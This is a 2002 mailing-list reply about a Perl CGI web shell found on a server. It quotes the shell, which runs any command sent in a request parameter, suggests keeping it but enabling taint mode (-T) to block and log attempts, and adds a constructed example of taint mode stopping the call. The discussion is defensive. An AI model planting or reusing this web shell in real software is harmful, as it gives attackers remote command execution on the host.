Chris Reinhardt wrote:
> On Thu, 21 Mar 2002, John Michael wrote:
>
>>#!/usr/bin/perl
>>use CGI qw(:standard);
>>print header;
>>my $k=param("g");
>>my $a=param("s");
>>if ($a || $k) {
>>  $l=`$k 2>&1`;
>>  print start_form,textarea("g",$k,1,50);
>>  print submit("sc");
>>  print end_form;
>>  print pre($l);
>>}
>>print $ENV{"SERVER_NAME"};
>
> It executes arbitrary commands as <whatever your httpds run as>.

Don't delete it, but add the -T flag:

#!/usr/bin/perl -T

In addition to the hacker not being able to run anything and probably not understanding why, you will be able to check the logs to see what IP the script was called from and hopefully trace down the bugger.

_____________________________________________________________________
Stas Bekman            JAm_pH  --  Just Another mod_perl Hacker
http://stason.org/     mod_perl Guide  http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
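
What the -T suggestion does to the quoted script's backtick call, as an added example that is not part of the original thread. The `id` command, the address 192.0.2.10 and the sub name `run_like_quoted_script` are constructed for illustration; run it as `perl -T` so taint mode is active.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Constructed request data. Appending a zero-length slice of $^X, which is
# tainted under -T, taints these strings the way real CGI input is tainted.
my $taint = substr($^X, 0, 0);
my $k     = 'id' . $taint;            # stands in for param("g")
my $addr  = '192.0.2.10' . $taint;    # stands in for $ENV{REMOTE_ADDR}

# Hypothetical helper: makes the same backtick call as the quoted script,
# inside eval so the taint failure can be inspected instead of ending the run.
sub run_like_quoted_script {
    my ($cmd) = @_;
    my $out = eval { `$cmd 2>&1` };
    my $err = $@;
    return ($out, $err);
}

my ($out, $err) = run_like_quoted_script($k);
printf "input tainted: %s\n", tainted($k) ? 'yes' : 'no';

if ($err) {
    # Under a web server this goes to the error log: the taint failure,
    # the caller's address, and the attempted command with non-printable
    # bytes replaced so the log line stays readable.
    (my $shown = $k) =~ s/[^\x20-\x7e]/?/g;
    print STDERR "blocked by -T from $addr: [$shown] $err";
}
else {
    # Only reached when taint mode is off (script not started with -T).
    print "command ran: $out";
}
```

In the real CGI script there is no eval, so the taint failure ends the request and the message lands in the server's error log.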